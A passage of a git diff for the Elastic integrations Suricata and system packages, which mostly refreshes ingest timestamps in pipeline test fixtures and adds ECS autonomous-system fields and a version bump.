"2021-12-09T13:45:29.680252400Z", "original": "{\"timestamp\":\"2018-07-05T15:51:54.001329-0400\",\"flow_id\":1828507008887644,\"event_type\":\"flow\",\"src_ip\":\"fe80:0000:0000:0000:fada:0cff:fedc:87f1\",\"src_port\":546,\"dest_ip\":\"ff02:0000:0000:0000:0000:0000:0001:0002\",\"dest_port\":547,\"proto\":\"UDP\",\"app_proto\":\"failed\",\"flow\":{\"pkts_toserver\":1,\"pkts_toclient\":0,\"bytes_toserver\":110,\"bytes_toclient\":0,\"start\":\"2018-07-05T15:51:23.453468-0400\",\"end\":\"2018-07-05T15:51:23.453468-0400\",\"age\":0,\"state\":\"new\",\"reason\":\"timeout\",\"alerted\":false}}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -786,7 +786,7 @@ } }, "event": { - "ingested": "2021-07-05T10:52:45.978278500Z", + "ingested": "2021-12-09T13:45:29.680255700Z", "original": "{\"timestamp\":\"2020-12-09T16:02:43.000505+0000\",\"flow_id\":913701662641234,\"in_iface\":\"eno6\",\"event_type\":\"http\",\"src_ip\":\"192.168.50.1\",\"src_port\":57134,\"dest_ip\":\"192.168.50.1\",\"dest_port\":8080,\"proto\":\"TCP\",\"tx_id\":0,\"http\":{\"hostname\":\"ctldl.windowsupdate.com\",\"url\":\"http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/pinrulesstl.cab?111111111111\",\"http_user_agent\":\"Microsoft-CryptoAPI/10.0\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"length\":0}}", "category": [ "network", @@ -891,7 +891,7 @@ "version_protocol": "tls" }, "event": { - "ingested": "2021-07-05T10:52:45.978281500Z", + "ingested": "2021-12-09T13:45:29.680259900Z", "original": "{\"timestamp\":\"2020-12-09T16:02:58.005716+0000\",\"flow_id\":1298574590709840,\"in_iface\":\"eno6\",\"event_type\":\"tls\",\"src_ip\":\"192.168.50.1\",\"src_port\":60614,\"dest_ip\":\"192.168.50.1\",\"dest_port\":443,\"proto\":\"TCP\",\"tls\":{\"subject\":\"C=US, ST=New York, L=New York City, O=Acme U.S.A., INC., CN=update.acme.com\",\"issuerdn\":\"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=GeoTrust RSA CA 2018\",\"serial\":\"0D:CE:DC:BC:AF:92:56:B4:C5:41:40:71:26:5B:1D:53\",\"fingerprint\":\"18:3c:11:45:46:e9:26:c7:87:64:0f:ed:47:86:1b:31:bf:0f:84:25\",\"version\":\"TLS 1.2\",\"notbefore\":\"2020-11-24T00:00:00\",\"notafter\":\"2021-12-25T23:59:59\",\"ja3\":{},\"ja3s\":{\"hash\":\"adc06261ef82c2e4688b3cf08c1b2f24\",\"string\":\"771,159,65281\"}}}", "category": [ "network" @@ -961,7 +961,7 @@ } }, "event": { - "ingested": "2021-07-05T10:52:45.978284300Z", + "ingested": "2021-12-09T13:45:29.680265300Z", "original": "{\"timestamp\":\"2020-12-09T16:03:00.179037+0000\",\"flow_id\":1097935193623328,\"in_iface\":\"eno6\",\"event_type\":\"http\",\"src_ip\":\"192.168.50.1\",\"src_port\":50898,\"dest_ip\":\"192.168.50.1\",\"dest_port\":8081,\"proto\":\"TCP\",\"tx_id\":0,\"http\":{\"hostname\":\"192.168.50.1\",\"http_port\":8081,\"url\":\"/uuid\",\"http_user_agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:84.0) Gecko/20100101 Firefox/84.0\",\"http_method\":\"POST\",\"protocol\":\"HTTP/1.1\",\"length\":0}}", "category": [ "network", @@ -1038,7 +1038,7 @@ } }, "event": { - "ingested": "2021-07-05T10:52:45.978287400Z", + "ingested": "2021-12-09T13:45:29.680271100Z", "original": "{\"timestamp\":\"2020-12-09T16:03:50.083307+0000\",\"flow_id\":289459143040794,\"in_iface\":\"eno6\",\"event_type\":\"tls\",\"src_ip\":\"192.168.50.1\",\"src_port\":12509,\"dest_ip\":\"192.168.50.1\",\"dest_port\":443,\"proto\":\"TCP\",\"tls\":{\"sni\":\"www.example.com\",\"version\":\"UNDETERMINED\",\"ja3\":{\"hash\":\"44d502d471cfdb99c59bdfb0f220e5a8\",\"string\":\"771,4865-4866-4867-49195-49199-49196-49200-52393-52392-49171-49172-156-157-47-53,0-23-65281-10-11-35-16-5-13-18-51-45-43-27-41,29-23-24,0\"},\"ja3s\":{}}}", "category": [ "network" diff --git a/packages/suricata/data_stream/eve/fields/ecs.yml b/packages/suricata/data_stream/eve/fields/ecs.yml index da34947b3b0..fa6d117c34f 100644 --- a/packages/suricata/data_stream/eve/fields/ecs.yml +++ b/packages/suricata/data_stream/eve/fields/ecs.yml @@ -86,6 +86,10 @@ name: rule.name - external: ecs name: source.address +- external: ecs + name: source.as.number +- external: ecs + name: source.as.organization.name - external: ecs name: source.bytes - external: ecs diff --git a/packages/suricata/docs/README.md b/packages/suricata/docs/README.md index 8368369c7ea..9ed9b345a4b 100644 --- a/packages/suricata/docs/README.md +++ b/packages/suricata/docs/README.md @@ -116,6 +116,8 @@ with other versions of Suricata. | rule.id | A rule ID that is unique within the scope of an agent, observer, or other entity using the rule for detection of this event. | keyword | | rule.name | The name of the rule or signature generating the event. | keyword | | source.address | Some event source addresses are defined ambiguously. The event will sometimes list an IP, a domain or a unix socket. You should always store the raw address in the `.address` field. Then it should be duplicated to `.ip` or `.domain`, depending on which one it is. | keyword | +| source.as.number | Unique number allocated to the autonomous system. The autonomous system number (ASN) uniquely identifies each network on the Internet. | long | +| source.as.organization.name | Organization name. | keyword | | source.bytes | Bytes sent from the source to the destination. | long | | source.geo.city_name | City name. | keyword | | source.geo.continent_name | Name of the continent. | keyword | diff --git a/packages/suricata/manifest.yml b/packages/suricata/manifest.yml index a65028db85a..5d76ac99ff5 100644 --- a/packages/suricata/manifest.yml +++ b/packages/suricata/manifest.yml @@ -1,6 +1,6 @@ name: suricata title: Suricata Events -version: 1.3.0 +version: 1.3.1 release: ga description: Collect and parse event logs from Suricata instances with Elastic Agent. type: integration diff --git a/packages/system/changelog.yml b/packages/system/changelog.yml index 8ea20456c43..94faf46896a 100644 --- a/packages/system/changelog.yml +++ b/packages/system/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.6.5" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "1.6.4" changes: - description: More consistent use of Proc Filesystem Directory settings diff --git a/packages/system/data_stream/auth/_dev/test/pipeline/test-auth-ubuntu1204.log-expected.json b/packages/system/data_stream/auth/_dev/test/pipeline/test-auth-ubuntu1204.log-expected.json index fad0f47feb7..48c56ff37ae 100644 --- a/packages/system/data_stream/auth/_dev/test/pipeline/test-auth-ubuntu1204.log-expected.json +++ b/packages/system/data_stream/auth/_dev/test/pipeline/test-auth-ubuntu1204.log-expected.json @@ -24,7 +24,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624921103Z", + "ingested": "2021-12-09T13:45:36.403832700Z", "timezone": "+0000", "kind": "event" }, @@ -64,7 +64,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624923080Z", + "ingested": "2021-12-09T13:45:36.403841800Z", "timezone": "+0000", "kind": "event" }, @@ -99,7 +99,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624923572Z", + "ingested": "2021-12-09T13:45:36.403847800Z", "timezone": "+0000", "kind": "event" }, @@ -135,7 +135,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624923968Z", + "ingested": "2021-12-09T13:45:36.403853600Z", "timezone": "+0000", "kind": "event" }, @@ -175,7 +175,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624924363Z", + "ingested": "2021-12-09T13:45:36.403859600Z", "timezone": "+0000", "kind": "event" }, @@ -206,7 +206,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624924759Z", + "ingested": "2021-12-09T13:45:36.403866400Z", "timezone": "+0000", "kind": "event" }, @@ -236,7 +236,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624925169Z", + "ingested": "2021-12-09T13:45:36.403872100Z", "timezone": "+0000", "kind": "event" }, @@ -272,7 +272,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624925564Z", + "ingested": "2021-12-09T13:45:36.403878700Z", "timezone": "+0000", "kind": "event" }, @@ -305,7 +305,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624925954Z", + "ingested": "2021-12-09T13:45:36.403884200Z", "timezone": "+0000", "kind": "event" }, @@ -327,7 +327,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-07-30T21:06:01.624926346Z", + "ingested": "2021-12-09T13:45:36.403889300Z", "timezone": "+0000", "kind": "event" }, @@ -364,7 +364,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624926738Z", + "ingested": "2021-12-09T13:45:36.403895200Z", "timezone": "+0000", "kind": "event" }, @@ -399,7 +399,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624927274Z", + "ingested": "2021-12-09T13:45:36.403900Z", "timezone": "+0000", "kind": "event" }, @@ -433,7 +433,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624927670Z", + "ingested": "2021-12-09T13:45:36.403904600Z", "timezone": "+0000", "kind": "event" }, @@ -463,7 +463,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624928073Z", + "ingested": "2021-12-09T13:45:36.403908300Z", "timezone": "+0000", "kind": "event" }, @@ -508,7 +508,7 @@ "ip": "10.0.2.2" }, "event": { - "ingested": "2021-07-30T21:06:01.624928465Z", + "ingested": "2021-12-09T13:45:36.403913200Z", "timezone": "+0000", "kind": "event", "action": "ssh_login", @@ -550,7 +550,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624928854Z", + "ingested": "2021-12-09T13:45:36.403918200Z", "timezone": "+0000", "kind": "event" }, @@ -594,7 +594,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624929424Z", + "ingested": "2021-12-09T13:45:36.403923400Z", "timezone": "+0000", "kind": "event" }, @@ -636,7 +636,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624929833Z", + "ingested": "2021-12-09T13:45:36.403928300Z", "timezone": "+0000", "kind": "event" }, @@ -671,7 +671,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624930222Z", + "ingested": "2021-12-09T13:45:36.403934400Z", "timezone": "+0000", "kind": "event" }, @@ -707,7 +707,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624930614Z", + "ingested": "2021-12-09T13:45:36.403938800Z", "timezone": "+0000", "kind": "event" }, @@ -752,7 +752,7 @@ "ip": "10.0.2.2" }, "event": { - "ingested": "2021-07-30T21:06:01.624969294Z", + "ingested": "2021-12-09T13:45:36.403943300Z", "timezone": "+0000", "kind": "event", "action": "ssh_login", @@ -794,7 +794,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624970822Z", + "ingested": "2021-12-09T13:45:36.403947400Z", "timezone": "+0000", "kind": "event" }, @@ -828,7 +828,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624971279Z", + "ingested": "2021-12-09T13:45:36.403952400Z", "timezone": "+0000", "kind": "event" }, @@ -858,7 +858,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624988375Z", + "ingested": "2021-12-09T13:45:36.403958200Z", "timezone": "+0000", "kind": "event" }, @@ -891,7 +891,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624989005Z", + "ingested": "2021-12-09T13:45:36.403964100Z", "timezone": "+0000", "kind": "event" }, @@ -928,7 +928,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624989402Z", + "ingested": "2021-12-09T13:45:36.403969800Z", "timezone": "+0000", "kind": "event" }, @@ -973,7 +973,7 @@ "ip": "10.0.2.2" }, "event": { - "ingested": "2021-07-30T21:06:01.624989793Z", + "ingested": "2021-12-09T13:45:36.403975600Z", "timezone": "+0000", "kind": "event", "action": "ssh_login", @@ -1015,7 +1015,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624990186Z", + "ingested": "2021-12-09T13:45:36.403980100Z", "timezone": "+0000", "kind": "event" }, @@ -1049,7 +1049,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624990575Z", + "ingested": "2021-12-09T13:45:36.403984700Z", "timezone": "+0000", "kind": "event" }, @@ -1079,7 +1079,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624990961Z", + "ingested": "2021-12-09T13:45:36.404006300Z", "timezone": "+0000", "kind": "event" }, @@ -1119,7 +1119,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624991355Z", + "ingested": "2021-12-09T13:45:36.404010700Z", "timezone": "+0000", "kind": "event" }, @@ -1154,7 +1154,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624991765Z", + "ingested": "2021-12-09T13:45:36.404035700Z", "timezone": "+0000", "kind": "event" }, @@ -1191,7 +1191,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624992160Z", + "ingested": "2021-12-09T13:45:36.404040500Z", "timezone": "+0000", "kind": "event" }, @@ -1228,7 +1228,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624992560Z", + "ingested": "2021-12-09T13:45:36.404045800Z", "timezone": "+0000", "kind": "event" }, @@ -1260,7 +1260,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624993093Z", + "ingested": "2021-12-09T13:45:36.404050100Z", "timezone": "+0000", "kind": "event" }, @@ -1293,7 +1293,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624993500Z", + "ingested": "2021-12-09T13:45:36.404059900Z", "timezone": "+0000", "kind": "event" }, @@ -1326,7 +1326,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624993890Z", + "ingested": "2021-12-09T13:45:36.404065100Z", "timezone": "+0000", "kind": "event" }, @@ -1363,7 +1363,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624994309Z", + "ingested": "2021-12-09T13:45:36.404070200Z", "timezone": "+0000", "kind": "event" }, @@ -1408,7 +1408,7 @@ "ip": "10.0.2.2" }, "event": { - "ingested": "2021-07-30T21:06:01.624995961Z", + "ingested": "2021-12-09T13:45:36.404075200Z", "timezone": "+0000", "kind": "event", "action": "ssh_login", @@ -1450,7 +1450,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624996388Z", + "ingested": "2021-12-09T13:45:36.404102300Z", "timezone": "+0000", "kind": "event" }, @@ -1494,7 +1494,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624996809Z", + "ingested": "2021-12-09T13:45:36.404112700Z", "timezone": "+0000", "kind": "event" }, @@ -1529,7 +1529,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624997206Z", + "ingested": "2021-12-09T13:45:36.404118800Z", "timezone": "+0000", "kind": "event" }, @@ -1565,7 +1565,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624997598Z", + "ingested": "2021-12-09T13:45:36.404124800Z", "timezone": "+0000", "kind": "event" }, @@ -1595,7 +1595,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624997984Z", + "ingested": "2021-12-09T13:45:36.404130700Z", "timezone": "+0000", "kind": "event" }, @@ -1625,7 +1625,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624998382Z", + "ingested": "2021-12-09T13:45:36.404136500Z", "timezone": "+0000", "kind": "event" }, @@ -1658,7 +1658,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624998772Z", + "ingested": "2021-12-09T13:45:36.404142500Z", "timezone": "+0000", "kind": "event" }, @@ -1695,7 +1695,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624999189Z", + "ingested": "2021-12-09T13:45:36.404148400Z", "timezone": "+0000", "kind": "event" }, @@ -1740,7 +1740,7 @@ "ip": "10.0.2.2" }, "event": { - "ingested": "2021-07-30T21:06:01.624999598Z", + "ingested": "2021-12-09T13:45:36.404154500Z", "timezone": "+0000", "kind": "event", "action": "ssh_login", @@ -1782,7 +1782,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624999982Z", + "ingested": "2021-12-09T13:45:36.404159300Z", "timezone": "+0000", "kind": "event" }, @@ -1831,7 +1831,7 @@ "ip": "10.0.2.2" }, "event": { - "ingested": "2021-07-30T21:06:01.625000365Z", + "ingested": "2021-12-09T13:45:36.404164100Z", "timezone": "+0000", "kind": "event", "action": "ssh_login", @@ -1873,7 +1873,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625000856Z", + "ingested": "2021-12-09T13:45:36.404169700Z", "timezone": "+0000", "kind": "event" }, @@ -1917,7 +1917,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625001263Z", + "ingested": "2021-12-09T13:45:36.404173300Z", "timezone": "+0000", "kind": "event" }, @@ -1952,7 +1952,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625001718Z", + "ingested": "2021-12-09T13:45:36.404178Z", "timezone": "+0000", "kind": "event" }, @@ -1986,7 +1986,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625002112Z", + "ingested": "2021-12-09T13:45:36.404182900Z", "category": [ "iam" ], @@ -2021,7 +2021,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625002504Z", + "ingested": "2021-12-09T13:45:36.404186800Z", "category": [ "iam" ], @@ -2056,7 +2056,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625002903Z", + "ingested": "2021-12-09T13:45:36.404191300Z", "category": [ "iam" ], @@ -2102,7 +2102,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625003297Z", + "ingested": "2021-12-09T13:45:36.404195700Z", "category": [ "iam" ], @@ -2143,7 +2143,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625003688Z", + "ingested": "2021-12-09T13:45:36.404201100Z", "timezone": "+0000", "kind": "event" }, @@ -2170,7 +2170,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625004075Z", + "ingested": "2021-12-09T13:45:36.404206200Z", "timezone": "+0000", "kind": "event" }, @@ -2197,7 +2197,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625004477Z", + "ingested": "2021-12-09T13:45:36.404211400Z", "timezone": "+0000", "kind": "event" }, @@ -2224,7 +2224,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625004888Z", + "ingested": "2021-12-09T13:45:36.404216200Z", "timezone": "+0000", "kind": "event" }, @@ -2255,7 +2255,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625005280Z", + "ingested": "2021-12-09T13:45:36.404220700Z", "timezone": "+0000", "kind": "event" }, @@ -2288,7 +2288,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625005677Z", + "ingested": "2021-12-09T13:45:36.404225Z", "timezone": "+0000", "kind": "event" }, @@ -2325,7 +2325,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625006072Z", + "ingested": "2021-12-09T13:45:36.404228700Z", "timezone": "+0000", "kind": "event" }, @@ -2360,7 +2360,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625006467Z", + "ingested": "2021-12-09T13:45:36.404233300Z", "timezone": "+0000", "kind": "event" }, @@ -2396,7 +2396,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625006856Z", + "ingested": "2021-12-09T13:45:36.404237900Z", "timezone": "+0000", "kind": "event" }, @@ -2437,7 +2437,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625007259Z", + "ingested": "2021-12-09T13:45:36.404242500Z", "timezone": "+0000", "kind": "event" }, @@ -2468,7 +2468,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625007655Z", + "ingested": "2021-12-09T13:45:36.404246700Z", "timezone": "+0000", "kind": "event" }, @@ -2505,7 +2505,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625008047Z", + "ingested": "2021-12-09T13:45:36.404251900Z", "timezone": "+0000", "kind": "event" }, @@ -2540,7 +2540,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625008444Z", + "ingested": "2021-12-09T13:45:36.404257700Z", "timezone": "+0000", "kind": "event" }, @@ -2576,7 +2576,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625008855Z", + "ingested": "2021-12-09T13:45:36.404262200Z", "timezone": "+0000", "kind": "event" }, @@ -2617,7 +2617,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625009278Z", + "ingested": "2021-12-09T13:45:36.404267Z", "timezone": "+0000", "kind": "event" }, @@ -2648,7 +2648,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625009672Z", + "ingested": "2021-12-09T13:45:36.404272400Z", "timezone": "+0000", "kind": "event" }, @@ -2685,7 +2685,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625010068Z", + "ingested": "2021-12-09T13:45:36.404277300Z", "timezone": "+0000", "kind": "event" }, @@ -2720,7 +2720,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625010564Z", + "ingested": "2021-12-09T13:45:36.404283800Z", "timezone": "+0000", "kind": "event" }, @@ -2756,7 +2756,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625010962Z", + "ingested": "2021-12-09T13:45:36.404289800Z", "timezone": "+0000", "kind": "event" }, @@ -2789,7 +2789,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625011356Z", + "ingested": "2021-12-09T13:45:36.404295600Z", "timezone": "+0000", "kind": "event" }, @@ -2826,7 +2826,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625011748Z", + "ingested": "2021-12-09T13:45:36.404301500Z", "timezone": "+0000", "kind": "event" }, @@ -2859,7 +2859,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625012140Z", + "ingested": "2021-12-09T13:45:36.404307Z", "timezone": "+0000", "kind": "event" }, @@ -2891,7 +2891,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625012536Z", + "ingested": "2021-12-09T13:45:36.404310600Z", "timezone": "+0000", "kind": "event" }, @@ -2921,7 +2921,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625012918Z", + "ingested": "2021-12-09T13:45:36.404315Z", "timezone": "+0000", "kind": "event" }, @@ -2951,7 +2951,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625013298Z", + "ingested": "2021-12-09T13:45:36.404320100Z", "timezone": "+0000", "kind": "event" }, @@ -2996,7 +2996,7 @@ "ip": "10.0.2.2" }, "event": { - "ingested": "2021-07-30T21:06:01.625013688Z", + "ingested": "2021-12-09T13:45:36.404324900Z", "timezone": "+0000", "kind": "event", "action": "ssh_login", @@ -3038,7 +3038,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625014097Z", + "ingested": "2021-12-09T13:45:36.404329900Z", "timezone": "+0000", "kind": "event" }, @@ -3072,7 +3072,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625014490Z", + "ingested": "2021-12-09T13:45:36.404335900Z", "timezone": "+0000", "kind": "event" }, @@ -3102,7 +3102,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625014901Z", + "ingested": "2021-12-09T13:45:36.404362900Z", "timezone": "+0000", "kind": "event" }, @@ -3135,7 +3135,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625015319Z", + "ingested": "2021-12-09T13:45:36.404369500Z", "timezone": "+0000", "kind": "event" }, @@ -3168,7 +3168,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625015710Z", + "ingested": "2021-12-09T13:45:36.404374Z", "timezone": "+0000", "kind": "event" }, @@ -3205,7 +3205,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625016102Z", + "ingested": "2021-12-09T13:45:36.404378800Z", "timezone": "+0000", "kind": "event" }, @@ -3238,7 +3238,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625016489Z", + "ingested": "2021-12-09T13:45:36.404382500Z", "timezone": "+0000", "kind": "event" }, @@ -3275,7 +3275,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625016898Z", + "ingested": "2021-12-09T13:45:36.404386800Z", "timezone": "+0000", "kind": "event" }, @@ -3320,7 +3320,7 @@ "ip": "10.0.2.2" }, "event": { - "ingested": "2021-07-30T21:06:01.625017293Z", + "ingested": "2021-12-09T13:45:36.404391400Z", "timezone": "+0000", "kind": "event", "action": "ssh_login", @@ -3362,7 +3362,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625017682Z", + "ingested": "2021-12-09T13:45:36.404396600Z", "timezone": "+0000", "kind": "event" }, @@ -3406,7 +3406,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625018075Z", + "ingested": "2021-12-09T13:45:36.404401800Z", "timezone": "+0000", "kind": "event" }, @@ -3441,7 +3441,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625018475Z", + "ingested": "2021-12-09T13:45:36.404405700Z", "timezone": "+0000", "kind": "event" }, @@ -3477,7 +3477,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625018884Z", + "ingested": "2021-12-09T13:45:36.404410400Z", "timezone": "+0000", "kind": "event" }, @@ -3517,7 +3517,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625019286Z", + "ingested": "2021-12-09T13:45:36.404416300Z", "timezone": "+0000", "kind": "event" }, @@ -3552,7 +3552,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625019678Z", + "ingested": "2021-12-09T13:45:36.404421600Z", "timezone": "+0000", "kind": "event" }, @@ -3588,7 +3588,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625020069Z", + "ingested": "2021-12-09T13:45:36.404426400Z", "timezone": "+0000", "kind": "event" }, @@ -3628,7 +3628,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625020540Z", + "ingested": "2021-12-09T13:45:36.404432200Z", "timezone": "+0000", "kind": "event" }, @@ -3663,7 +3663,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625020928Z", + "ingested": "2021-12-09T13:45:36.404438Z", "timezone": "+0000", "kind": "event" }, @@ -3699,7 +3699,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625021319Z", + "ingested": "2021-12-09T13:45:36.404443900Z", "timezone": "+0000", "kind": "event" }, @@ -3739,7 +3739,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625021724Z", + "ingested": "2021-12-09T13:45:36.404449700Z", "timezone": "+0000", "kind": "event" }, @@ -3774,7 +3774,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625022119Z", + "ingested": "2021-12-09T13:45:36.404455500Z", "timezone": "+0000", "kind": "event" }, @@ -3810,7 +3810,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625022512Z", + "ingested": "2021-12-09T13:45:36.404459800Z", "timezone": "+0000", "kind": "event" }, @@ -3850,7 +3850,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625022894Z", + "ingested": "2021-12-09T13:45:36.404464700Z", "timezone": "+0000", "kind": "event" }, @@ -3885,7 +3885,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625023287Z", + "ingested": "2021-12-09T13:45:36.404469400Z", "timezone": "+0000", "kind": "event" }, @@ -3919,7 +3919,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625023749Z", + "ingested": "2021-12-09T13:45:36.404473600Z", "category": [ "iam" ], @@ -3954,7 +3954,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625024138Z", + "ingested": "2021-12-09T13:45:36.404478200Z", "category": [ "iam" ], @@ -3989,7 +3989,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625024545Z", + "ingested": "2021-12-09T13:45:36.404482500Z", "category": [ "iam" ], @@ -4035,7 +4035,7 @@ "hostname": "precise32" }, "event": { - "ingested": 